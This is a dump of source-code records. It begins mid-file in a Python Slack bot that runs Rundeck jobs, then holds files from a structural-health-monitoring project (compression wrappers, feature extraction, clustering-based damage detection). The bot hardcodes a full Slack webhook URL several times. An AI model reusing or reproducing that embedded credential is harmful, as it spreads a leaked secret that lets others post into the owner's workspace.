jobOutputXML.getElementsByTagName('name')\n job_description_list = jobOutputXML.getElementsByTagName('description')\n\n #Make sure we dont have any empty fields in the attachments created later\n if job_description_list.length <= 2:\n job_desc = \"No Description\"\n elif job_description_list.length > 2:\n job_desc = job_description_list[0].firstChild.nodeValue\n\n #Get the start and end times of the job by getting the relevant tags from the XML and assigning the data inside the tags to variables\n time_started_var = jobOutputXML.getElementsByTagName('date-started')\n time_finished_var = jobOutputXML.getElementsByTagName('date-ended')\n job_start_time = time_started_var[0].firstChild.nodeValue\n job_end_time = time_finished_var[0].firstChild.nodeValue\n\n #Remove the 'T' and 'Z' characters from the time strings\n for ch in ['T', 'Z']:\n if ch in job_start_time:\n job_start_time = job_start_time.replace(ch, ' ')\n for ch in ['T', 'Z']:\n if ch in job_end_time:\n job_end_time = job_end_time.replace(ch, ' ')\n\n #Create a payload for another slack message attachment\n payload = {}\n\n attachments = [{\"color\": \"#0043c4\", \"title\": job_name[0].firstChild.nodeValue, \"text\": job_desc}, {\n \"color\": \"#0043c4\", \"title\": \"Started: \" + job_start_time, \"text\": \"Finished: \" + job_end_time}]\n\n failed_nodes_obj = jobOutputXML.getElementsByTagName(\"failedNodes\")\n\n payload[\"attachments\"] = attachments\n\n webhook_url = 'https://hooks.slack.com/services/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'\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n #Delete the XML file, might as well try to be neat eh?\n os.remove(\"jobXML.xml\")\n\ndef rundeckstatus():\n #Similar to the previous job, here we create an XML file (yaaay XML!) and parse it, getting the version number, node it is running on, uptime and CPU usage\n system_information = vars(rd.api.system_info())\n sysinfo_xml_file = open(\"sysinfoXML.xml\", \"w\")\n sysinfo_xml_file.write(str(system_information[\"body\"]))\n sysinfo_xml_file.close()\n systemInfoXML = minidom.parse('sysinfoXML.xml')\n #Version info\n rundeck_version_info = systemInfoXML.getElementsByTagName('message')\n #XML parsing module number 2, ElementTree :)\n ETXML = ET.parse('sysinfoXML.xml')\n #Getting uptie\n for value in ETXML.getiterator(tag='uptime'):\n uptime = value.attrib['duration']\n hours = int(int(uptime) / (60 * 60 * 1000))\n #Getting CPU usage\n for value in ETXML.getiterator(tag='loadAverage'):\n cpu_usage_element = ET.tostring(value).decode('utf-8')\n cpu_usage = re.findall('\\d+\\.\\d+', cpu_usage_element)\n\n #Post the message to slack\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Rundeck Info :nerd_face: :\" + \"`\" + str(rundeck_version_info[0].firstChild.nodeValue)[16:] + \"`\\n\" + \"Uptime :alarm_clock: : \" + \"`\" + str(\n hours) + \" hours`\\n\" + \"CPU Usage :desktop_computer: : \" + \"`\" + str(cpu_usage[0]) + \"%\" + \"`\\n\",\n as_user='true:'\n )\n #Delete XML file\n os.remove('sysinfoXML.xml')\n\ndef executions():\n #TODO variablise this!!!\n webhook_url = 'https://hooks.slack.com/services/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'\n attachments = []\n payload = {}\n #More XML file creation\n execution_output = vars(rd.api.executions('IPP'))\n executionInfoXML = open(\"executionInfoXML.xml\", \"w\")\n executionInfoXML.write(str(execution_output[\"body\"]))\n executionInfoXML.close()\n\n #Wait why aren't we using minidom here?\n executionsXML = ET.parse('executionInfoXML.xml')\n\n #Get execution info from the XML file and insert it into the attachment fields\n for value in executionsXML.getiterator(tag='execution'):\n attachment = {}\n if isinstance(value.attrib, dict):\n #Job ID\n attachment[\"title\"] = value.attrib[\"id\"]\n #Link to job\n attachment[\"title_link\"] = value.attrib[\"href\"]\n #Status of job i.e running, successful, failed etc\n attachment[\"text\"] = value.attrib[\"status\"]\n attachment[\"fallback\"] = \"\"\n #Colours :D\n if value.attrib[\"status\"] == \"succeeded\":\n attachment[\"color\"] = \"#0dff00\"\n else:\n attachment[\"color\"] = \"#ff0000\"\n attachments.append(attachment)\n #Setting message title text\n payload[\"text\"] = \"Todays rundeck jobs so far :clipboard:\"\n payload[\"attachments\"] = attachments\n #Sending the message to slack, you know the drill ;)\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n os.remove('executionInfoXML.xml')\n\ndef runjobrdp():\n #Notify users not to interact with the bot until the command has finished running TODO figure out how to allow multiple commands simultaneously\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Running Get RDP Sessions job, this could take up to 2 minutes, please wait until the results message comes back before using any other commands\",\n as_user='true:'\n )\n\n #Assign job results to job_object variable. This won't happen until the job has finished running on rundeck\n time.sleep(0.5)\n job_object = rd.run_job('488abbce-d06c-4111-a2d3-3d8ae0a393d4',\n argString={'from': 'Rundeck Slack Bot'}, timeout=120)\n\n time.sleep(0.5)\n #Assign results to job results to variable by calling execution output using ID from the RDP job that was just run\n job_results = rd.get_execution_output(job_object[\"id\"])\n\n #Are the colours getting annoying?\n message_colour = \"#00ff39\"\n if job_object[\"status\"] != \"succeeded\":\n message_colour = \"#ff0000\"\n elif job_object[\"status\"] == \"running\":\n message_colour = \"#ffbf00\"\n\n #Build payload to send links to job to slack\n payload = {\n \"attachments\": [\n {\n \"color\": \"%s\" % message_colour,\n \"title\": \"RDP Rundeck Job Page\",\n \"text\": \"Link to the page for the job that was run\",\n \"title_link\": \"%s\" % job_object[\"job\"][\"permalink\"]\n },\n {\n \"color\": \"%s\" % message_colour,\n \"title\": \"RDP Rundeck Job Results Page\",\n \"text\": \"Permalink to the results of this specific job execution\",\n \"title_link\": \"%s\" % job_object[\"href\"]\n }\n ]\n }\n\n #TODO variablise this damnit!\n webhook_url = 'https://hooks.slack.com/services/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'\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n\n time.sleep(0.5)\n job_results = rd.get_execution_output(job_object[\"id\"])\n\n #Build message for list of users with disconected sessions\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Users with disconnected RDP sessions are:\",\n as_user='true:'\n )\n\n rdp_users_text = \"\"\n\n #Build string of usernames\n for result in job_results[\"entries\"]:\n if isinstance(result, dict):\n if \"|\" in result[\"log\"]:\n rdp_users_text += result[\"log\"].split(\"|\", 1)[1] + \",\"\n\n #Send user list to slack\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=rdp_users_text,\n as_user='true:'\n )\n\ndef runjobsiteversions(resources):\n\n '''\n This one's a long one, might want to get a cuppa while you read this :(\n '''\n\n #Check the message text and make sure the node specified in the command matches a node in the list provided by rundeck\n nodes = []\n for key in resources.keys():\n nodes.append(key)\n\n #Notify the user if that have specified a node that doesnt exist (now with emojis!)\n if text[21:] not in nodes:\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"That server doesn't exist :face_with_rolling_eyes: Did you make a typo?\",\n as_user='true:'\n )\n #Notify users not to interact with the bot until the command has returned results\n else:\n\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Running Get Site Versions job, please wait until the results message comes back before using any other commands\",\n as_user='true:'\n )\n\n time.sleep(0.5)\n #Run the job and assign the results object to this variable\n job_object = rd.run_job('242f3848-20fa-4ff9-8014-9acb45a6a7c5',\n argString={'from': 'Rundeck Slack Bot'}, timeout=120, name=text[21:])\n\n #More colours *sigh*\n message_colour = \"#00ff39\"\n if job_object[\"status\"] != \"succeeded\":\n message_colour = \"#ff0000\"\n elif job_object[\"status\"] == \"running\":\n message_colour = \"#ffbf00\"\n\n #More attachment building *sigh*\n payload = {\n \"attachments\": [\n {\n \"color\": \"%s\" % message_colour,\n \"title\": \"Site Versions Rundeck Job Page\",\n \"text\": \"Link to the page for the job that was run\",\n \"title_link\": \"%s\" % job_object[\"job\"][\"permalink\"]\n },\n {\n \"color\": \"%s\" % message_colour,\n \"title\": \"Site Versions Rundeck Job Results Page\",\n \"text\": \"Permalink to the results of this specific job execution\",\n \"title_link\": \"%s\" % job_object[\"href\"]\n }\n ]\n }\n\n #More webhook creation *double sigh* can you just variablise this already?\n webhook_url = 'https://hooks.slack.com/services/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'\n response = requests.post(webhook_url, data=json.dumps(\n payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (\n response.status_code, response.text))\n\n time.sleep(0.5)\n #Notify the user that the job is finished and freshly baked results are being flown to the chat by carrier pigeon\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"Getting site versions. Give me a minute :thinking_face:\",\n as_user='true:'\n )\n\n #Assign job output to variable TODO see why this is erroring with \"no attribute '_as_dict_method' \"\n version_list_data = rd.get_execution_output(job_object[\"id\"])\n\n #Get version numbers from said results data\n site_version_list = version_list_data[\"entries\"]\n\n #Append version numbers to the newly created log_key_list list\n log_key_list = []\n final_list = {}\n for result in site_version_list:\n log_key_list.append(result[\"log\"])\n\n payload = {}\n attachments = []\n\n #Iterate through results list\n for site_result in log_key_list:\n r = []\n #Here we use regex to split the strings in each index of the list and assign them to variable 'x'\n x = re.split(\"\\s*([d|D]:\\\\\\\\.*)\", site_result)\n #If the string is long enough, we delete the first characters to format the numbers properly\n if len(x) >= 3:\n del x[1]\n del x[1]\n #Split the string again at index 0 into site name and version number\n y = x[0].split()\n if len(y) == 2:\n site_name = y[0]\n site_version = y[1]\n final_list[str(site_name)] = str(site_version)\n if \"host\" in site_name:\n host_name = site_version\n if \"env\" in site_name:\n env_name = site_version\n if \"host\" not in site_name or \"env\" not in site_name:\n attachment = {}\n attachment[\"color\"] = \"#ff0073\"\n attachment[\"title\"] = site_name\n attachment[\"text\"] = site_version\n attachments.append(attachment)\n\n #Format the attachment text with the results and send tham to the chat\n payload[\"text\"] = \"Site Versions: [{}] on [{}]\".format(env_name, host_name)\n payload[\"attachments\"] = attachments\n\n\n response = requests.post(webhook_url, data=json.dumps(payload), headers={'Content-Type': 'application/json'})\n if response.status_code != 200:\n raise ValueError('Request to slack returned an error %s, the response is:\\n%s' % (response.status_code, response.text))\n\ntry:\n #Connect to the real time messaging API\n if slack_client.rtm_connect():\n #Run forever TODO see about an alternative for this\n while True:\n #Start reading the channel for any matching command strings\n events = slack_client.rtm_read()\n for event in events:\n if (\n 'channel' in event and\n 'text' in event and\n event.get('type') == 'message'\n ):\n channel = event['channel']\n text = event['text']\n\n '''\n This is where we check the messages to see if they contain any bot commands. The check for 'Command List' ensures that the !help command does not trigger all the other functions\n '''\n if text == \"!help\":\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=\"\"\"slackdeckBot Command List:\\n`!listjobs` - This shows a list of jobs currently in the IPP Rundeck project.\\n`!runjob:rdp` - This will run the 'Show RDP Sessions' Rundeck job and return links to the results page.\\n`!executions` - This is a WIP, it will generate an XML file with information about recently executed jobs and save it to the bot's working directory.\\n`!joboutput:[execution_id_number]` - This takes an execution job number and returns the name of the job and the date/time it was started and when it finished\\n`!rundeckstatus` - Gives some information about rundecks current state\"\"\",\n as_user='true:'\n )\n\n if 'that would be great' in text.lower() and link not in text:\n slack_client.api_call(\n 'chat.postMessage',\n channel=channel,\n text=link,\n as_user='true:'\n )\n\n if '!listjobs' in text.lower() and \"Command List\" not in text:\n list_jobs()\n\n if text == ('!runjob:rdp') and \"Command List\" not in text:\n runjobrdp()\n\n if text.startswith('!runjob:siteversions:') and \"Command List\" not in text:\n runjobsiteversions(resources)\n\n if text.startswith(\"!executions\") and \"Command List\" not in text:\n executions()\n\n if text.startswith('!rundeckstatus'):\n rundeckstatus()\n\n if text.startswith(\"!joboutput:\") and \"Command List\" not in text:\n job_output()\n\n if text == (\"!listnodes\"):\n list_nodes(resources)\n time.sleep(1)\n else:\n print('Connection failed, invalid token?')\nexcept Exception as e:\n print(e)\n"
}
] | 3 |
AlessandroFC15/Framework-SHM-UFPA
|
https://github.com/AlessandroFC15/Framework-SHM-UFPA
|
5e08e779eff13dc3fb66c92a6a90c70eab3fcf99
|
cd96a2817b61575aac1d10a333062b2642bdbe2f
|
a3dc2d8d42ea6b52a142f5e1e6f657a482022742
|
refs/heads/master
| 2020-03-26T13:24:47.036276 | 2018-08-21T15:55:19 | 2018-08-21T15:55:19 | 144,937,621 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7521865963935852,
"alphanum_fraction": 0.7900874614715576,
"avg_line_length": 33.29999923706055,
"blob_id": "76a96af2cfe02a8c8238e2445e562234baa9a284",
"content_id": "492b601e7e6207c2db5986ae0d52f2c5d6857734",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 343,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 10,
"path": "/main.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "from components.missing_data_simulator import MissingDataSimulator\nfrom components.missing_data_amputator import MissingDataAmputator\n\noriginal_data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nsimulator = MissingDataSimulator(original_data, 50)\n\nnew_dataset = simulator.simulate_missing_data()\n\nprint(MissingDataAmputator(new_dataset).amputate_data())\n"
},
{
"alpha_fraction": 0.6023704409599304,
"alphanum_fraction": 0.6142226457595825,
"avg_line_length": 33.150794982910156,
"blob_id": "0958731e7c4e9850cf38a1d4650c29cd936ff6c0",
"content_id": "0636e50ec0634734561c61e7dfbce5f4324356ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4304,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 126,
"path": "/algorithms/damage_detection/damage_detection.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nfrom algoritmos_felipe.DamageDetection import *\n\n\ndef get_average_results(algorithm, missing_data_percentage, num_iterations, imputation_method=None):\n results = {\n 'UCL': 0,\n 'error_type_1': 0,\n 'error_type_2': 0,\n 'true_positives': 0,\n 'true_negatives': 0,\n }\n\n invalid_iterations = 0\n\n for i in range(num_iterations):\n all_data = get_extracted_data(missing_data_percentage, i if missing_data_percentage != 0 else 0,\n imputation_method)\n\n learn_data = all_data[0:158, :]\n\n try:\n algorithm.train_and_test(learn_data, all_data, 197)\n\n results['UCL'] += algorithm.UCL\n results['error_type_1'] += algorithm.err[0]\n results['error_type_2'] += algorithm.err[1]\n results['true_positives'] += len([x for x in algorithm.class_states if x == 1])\n results['true_negatives'] += len([x for x in algorithm.class_states if x == 2])\n except Exception as e:\n invalid_iterations += 1\n print(e)\n\n print('Invalid iterations: {}'.format(invalid_iterations))\n return {key: value / (num_iterations - invalid_iterations) for key, value in results.items()}\n\n\ndef get_extracted_data(missing_data_percentage, iteration_number, imputation_method=None):\n if imputation_method:\n filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/{}/' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(imputation_method.description,\n missing_data_percentage, iteration_number)\n else:\n filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(missing_data_percentage, iteration_number)\n\n data = np.genfromtxt(filename, delimiter=',')\n\n # Pegando apenas as frequências\n data = data[:, [0, 1]]\n return data\n\n\nlist_missing_data_percentage = [5, 7, 10, 15]\n\nresults = {\n 'algorithm': [],\n 'missing_data_percentage': [],\n 'error_type_I': [],\n 'error_type_II': [],\n 'true_positives': [],\n 'true_negatives': [],\n}\n\n# imputation_strategy = DataImputation.MeanImputation\nimputation_strategy = None\n\nfor missing_data_percentage in list_missing_data_percentage:\n num_iterations = 25\n\n print(\">> {}% missing data | {} iterations <<\\n\".format(missing_data_percentage, num_iterations))\n\n # save_features_to_csv_file(missing_data_percentage, num_iterations, imputation_strategy)\n\n algorithms = [\n {'description': 'K-Means',\n 'algorithm': K_Means()},\n\n {'description': 'Fuzzy_C_Means',\n 'algorithm': Fuzzy_C_Means()},\n\n {'description': 'DBSCAN_Center',\n 'algorithm': DBSCAN_Center(0.09, 3)},\n\n {'description': 'Affinity_Propagation',\n 'algorithm': Affinity_Propagation()},\n\n {'description': 'GMM',\n 'algorithm': GMM()},\n\n {'description': 'G_Means',\n 'algorithm': G_Means()},\n ]\n\n for alg in algorithms:\n print(\"# \" + alg['description'])\n\n average_results = get_average_results(alg['algorithm'], missing_data_percentage, num_iterations,\n imputation_strategy)\n\n results['algorithm'].append(alg['description'])\n results['missing_data_percentage'].append(missing_data_percentage)\n results['error_type_I'].append(average_results['error_type_1'])\n results['error_type_II'].append(average_results['error_type_2'])\n results['true_positives'].append(average_results['true_positives'])\n results['true_negatives'].append(average_results['true_negatives'])\n\n print(average_results)\n print()\n\n# plt.legend()\n# plt.show()\n\ndf = pd.DataFrame(results)\n\nprint(df)\n\nif imputation_strategy:\n results_filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/results/imputation/' \\\n 'results_{}.csv'.format(imputation_strategy.description)\nelse:\n results_filename = '/home/alessandro/Documentos/Programming/Projects/TCC1/results/new_results_3.csv'\n\ndf.to_csv(results_filename)\n"
},
{
"alpha_fraction": 0.5422637462615967,
"alphanum_fraction": 0.5545171499252319,
"avg_line_length": 23.81958770751953,
"blob_id": "9a757cf7bd8e96f8760131125f2928ba95cbdd32",
"content_id": "e501cb84229ece5db4a26a1164b364c36d236fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4815,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 194,
"path": "/algoritmos_felipe/Compression.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import ctypes\n\nimport numpy as np\nfrom numpy.ctypeslib import ndpointer\n\nlib = ctypes.cdll.LoadLibrary('./compression_dll.dll')\n\n# ==========\n# APCA\n# ==========\nAPCA_Run = lib.APCA_Run\nAPCA_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\nAPCA_Run.restype = ctypes.c_double\n\n\ndef APCA_Compression(data, eps, relative_eps=False):\n out_data = np.empty(data.shape)\n error_type = 1 if relative_eps else 0\n ratio = APCA_Run(data, data.size, eps, error_type, out_data)\n return out_data, ratio\n\n\n# ==========\n# PCA\n# ==========\n\nPCA_Run = lib.PCA_Run\n\nPCA_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\n\nPCA_Run.restype = ctypes.c_double\n\n\ndef PCA_Compression(data, eps, relative_eps=False):\n out_data = np.empty(data.shape)\n error_type = 1 if relative_eps else 0\n ratio = PCA_Run(data, data.size, eps, error_type, 16, out_data)\n return out_data, ratio\n\n\n# ==========\n# Slide Filter\n# ==========\nSF_Run = lib.SF_Run\n\nSF_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\n\nSF_Run.restype = ctypes.c_double\n\n\ndef SF_Compression(data, eps, relative_eps=False):\n out_data = np.empty(data.shape)\n error_type = 1 if relative_eps else 0\n ratio = SF_Run(data, data.size, eps, error_type, out_data)\n return out_data, ratio\n\n\n# ==========\n# PWHLH\n# ==========\nPWLH_Run = lib.PWLH_Run\n\nPWLH_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\n\nPWLH_Run.restype = ctypes.c_double\n\n\ndef PWLH_Compression(data, eps, relative_eps=False):\n out_data = np.empty(data.shape)\n error_type = 1 if relative_eps else 0\n ratio = PWLH_Run(data, data.size, eps, error_type, out_data)\n return out_data, ratio\n\n\n# ==========\n# CHEB NOT WORKING\n# ==========\nCHEB_Run = lib.CHEB_Run\n\nCHEB_Run.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_size_t,\n ctypes.c_float,\n ctypes.c_int,\n ctypes.c_int,\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS')]\n\nCHEB_Run.restype = ctypes.c_double\n\n# ==========\n# RMSE\n# ==========\nRMSE = lib.RMSE\n\nRMSE.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_int]\n\nRMSE.restype = ctypes.c_double\n\n\ndef RMSE_Error(data1, data2):\n assert data1.shape == data2.shape\n return RMSE(data1, data2, data1.size)\n\n\n# ==========\n# STDV\n# ==========\nSTDV = lib.STDV\n\nSTDV.argtypes = [ndpointer(ctypes.c_double, flags='C_CONTIGUOUS'),\n ctypes.c_int]\n\nSTDV.restype = ctypes.c_double\n\n\ndef StandardDeviation(data1):\n return STDV(data1, data1.size)\n\n\nif __name__ == \"__main__\":\n # indata = np.random.rand(input_size) * 2\n import scipy.io as spio # version 0.17.0\n\n\n def valid(ind, outd, esp):\n for i in range(len(ind)):\n dif = abs(ind[i] - outd[i])\n if not dif <= esp:\n print(\"D\", dif, (dif < esp))\n\n\n matfile = 'Z24Full2.mat'\n matdata = spio.loadmat(matfile)\n a = matdata['Z24_TWN'].T\n data = a[0]\n\n stdv = STDV(data, data.size)\n K = 1\n\n pca_taxas = np.zeros(50)\n apca_taxas = np.zeros(50)\n pwlh_taxas = np.zeros(50)\n sf_taxas = np.zeros(50)\n ks = np.zeros(50)\n\n mx = np.max(data)\n mn = np.min(data)\n\n print(stdv)\n\n for k in range(0, 50):\n K = k / 10\n # eps = stdv * K / ( mx - mn)\n eps = K\n print(eps)\n\n pca_result = PCA_Compression(data, eps)\n apca_result = APCA_Compression(data, eps)\n pwlh_result = PWLH_Compression(data, eps)\n sf_result = SF_Compression(data, eps)\n\n pca_taxas[k] = 1 - pca_result[1]\n apca_taxas[k] = 1 - apca_result[1]\n pwlh_taxas[k] = 1 - pwlh_result[1]\n sf_taxas[k] = 1 - sf_result[1]\n ks[k] = K\n\n import matplotlib.pyplot as plt\n\n plt.plot(ks, pca_taxas, 'k')\n plt.plot(ks, apca_taxas, 'b')\n plt.plot(ks, pwlh_taxas, 'r')\n plt.plot(ks, sf_taxas, 'y')\n\n plt.axis([0, 5, 0, 5])\n plt.show()\n"
},
{
"alpha_fraction": 0.5682129859924316,
"alphanum_fraction": 0.5953884124755859,
"avg_line_length": 23.782312393188477,
"blob_id": "b58daf2a8abe741f8679fa9c2b2c9f85dc9f8b21",
"content_id": "f2fda419b6dcf2d75c10dab579dde9b8115723d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3656,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 147,
"path": "/algorithms/feature_extraction/step_extraction.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport numpy.matlib\nfrom scipy import signal\n\n\ndef nextpow2(i):\n i = abs(i)\n\n n = 0\n\n while True:\n if 2 ** n >= i:\n return n\n\n n += 1\n\n\ndef fct_fft(x, dt):\n try:\n nrow, ncol = x.shape # matrix dimensions\n except ValueError:\n nrow, = x.shape\n ncol = 1\n\n # t = (0:nrow - 1)*dt # Time vector\n t = [x * dt for x in range(0, nrow)] # Time vector\n Fs = 1 / dt # Sampling frequency\n\n # Exponential window for accelerometers\n hann_window = np.hanning(nrow)\n\n m = x * hann_window\n\n NFFT = 2 ** nextpow2(nrow) # Next power of 2 from length of y(t)\n\n freq = Fs / 2 * np.linspace(0, 1, NFFT / 2) # Nyquist frequency\n\n AUX = np.fft.fft(m, NFFT) / nrow\n\n yfft = AUX[0:int(NFFT / 2)]\n\n return freq, yfft\n\n\ndef feature_shm_ufpa(data, dt, limits):\n # dt data increment in seconds\n fs = 1 / dt # frequency\n\n # Application of a filter\n\n # % Design a Butterworth IIR digital filter\n # For data sampled at 100 Hz, design a 3th-order highpass Butterworth\n # filter, with a cutoff frequency of 3 Hz, which corresponds to a\n # normalized value of 0.06.\n\n wn = 2 / (fs / 2) # normalized cutoff frequency Wn (2 Hz)\n\n # [bb, aa] = butter(3, wn, 'high')\n bb, aa = signal.butter(3, wn, 'highpass')\n\n # Performs zero-phase digital filtering by processing the input data\n data = signal.filtfilt(bb, aa, data)\n\n # clear aa bb\n del bb\n del aa\n\n #################################\n # Estimate the FFT\n\n # Hanning window\n xfreq, Yfft = fct_fft(data, dt)\n\n m = len(xfreq)\n\n df = xfreq[1] - xfreq[0]\n\n # Auto-power spectral density\n psd = 1 / (m * dt) * Yfft * Yfft.conj()\n\n #################################\n # Averaged normalized power spectral density - ANPSD\n\n # Estimate ANPSD\n\n mean_vector = np.sum(psd)\n\n # Reshape necessário para que tenha o mesmo shape que o resultado do repmat no mean_vector\n psd = numpy.reshape(psd, (m, 1))\n\n NPSD = psd / numpy.matlib.repmat(mean_vector, m, 1)\n\n ANPSD = np.sum(NPSD, axis=1)\n\n #################################\n # Extract the natural frequencies\n a1 = limits[0][0]\n d1 = limits[0][1]\n\n indx = np.argmax(abs(ANPSD[a1 - d1 - 1: a1 + d1]))\n ind = a1 - d1 + indx - 1\n freq1 = xfreq[ind]\n\n a1 = limits[1][0]\n d1 = limits[1][1]\n\n indx = np.argmax(abs(ANPSD[a1 - d1 - 1: a1 + d1]))\n ind = a1 - d1 + indx - 1\n freq2 = xfreq[ind]\n\n energy = np.trapz(abs(ANPSD[round(len(ANPSD) / 2):len(ANPSD)]))\n\n return [freq1, freq2, energy]\n\n\ndef step_extraction(data, col):\n \"\"\"\n STEP_EXTRACTION Etapa de extração de features.\n\n% São utilizadas 3 features do sinal para a detecção de danos:\n% As duas primeiras são a Primeira e Terceira Frequência Natural (F1 e\n% F3, respectivamente).\n% A terceira consiste na quantidade de energia presente na segunda metade\n% do espectro.\n\n% INPUT\n% data: Matrix com as leitura dos acelerômetros no domínio do tempo.\n% col: Coluna da matriz com as leituras desejadas. Nos dados\n% originais, col=2 equivale às leituras do sensor 5. Nos dados\n% comprimidos, normalmente col=1, pois se comprimiu as leituras de\n% apenas um sensor.\n\n% OUTPUT\n feat_vector: Feature vector com as 3 features (F1, F3, A).\n \"\"\"\n\n # Propriedades de amostragem\n dt = 0.01 # segundos\n\n # Janelas para estimar as frequências naturais F1 e F3.\n limits = [[2600, 300], [6600, 900]]\n\n data_coluna = data # Pegar data só de uma coluna\n\n feat_vector = feature_shm_ufpa(data_coluna, dt, limits)\n\n return feat_vector\n"
},
{
"alpha_fraction": 0.6230529546737671,
"alphanum_fraction": 0.636137068271637,
"avg_line_length": 33.1489372253418,
"blob_id": "a2ddd8ee6dec4ff12ae6eecd3844611b34f90bf2",
"content_id": "ff2a768f352120fcaea1defdbcf59f27b16a7460",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1606,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 47,
"path": "/algorithms/feature_extraction/full_database_feature_extraction.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
"text": "import csv\nimport decimal\nimport time\n\nimport os\nimport re\n\nfrom algorithms.feature_extraction.feature_extraction import extract_features\n\n\ndef save_features_to_csv_file(missing_data_percentage, num_iterations=1, imputation_strategy=None):\n files_directory = '/home/alessandro/FELIPE/Z24_bridge/Z24Date/'\n\n # Pegar todos os arquivos registrados às 12h\n files = [f for f in os.listdir(files_directory) if re.match(r'.*_12\\.mat', f)]\n files.sort()\n\n for i in range(num_iterations):\n t0 = time.time()\n\n extracted_data = []\n\n for j, filename in enumerate(files):\n print('#{} | {} | Extracting {} ...'.format(i + 1, j + 1, filename))\n extracted_data.append(\n extract_features(files_directory + filename, missing_data_percentage, imputation_strategy))\n\n print(\">> Criando arquivo csv...\")\n\n file_name = '/home/alessandro/Documentos/Programming/Projects/TCC1/algorithms/features/{}' \\\n 'Features_Originais_Hora_12_Sensor_5_MDP_{}_{}.csv'.format(\n ('{}/'.format(imputation_strategy.description) if imputation_strategy else ''), missing_data_percentage, i)\n\n with open(file_name, 'w') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter=',')\n\n for row in extracted_data:\n csv_writer.writerow([round(x, 4) for x in row])\n\n t1 = time.time()\n total = t1 - t0\n\n print('Tempo passado: {}'.format(total))\n\n\ndef get_number_decimal_places_from_float(float_number):\n return decimal.Decimal(str(float_number)).as_tuple().exponent * -1\n"
},
{
"alpha_fraction": 0.6869051456451416,
"alphanum_fraction": 0.6960945129394531,
"avg_line_length": 56.49056625366211,
"blob_id": "aaf88cfbb8dee774d029ab8090c5e847afd927e1",
"content_id": "3e6a5563112544c5d3d8eb1b66ddd523d121d673",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3052,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 53,
"path": "/results/results_analysis_2.py",
"repo_name": "AlessandroFC15/Framework-SHM-UFPA",
"src_encoding": "UTF-8",
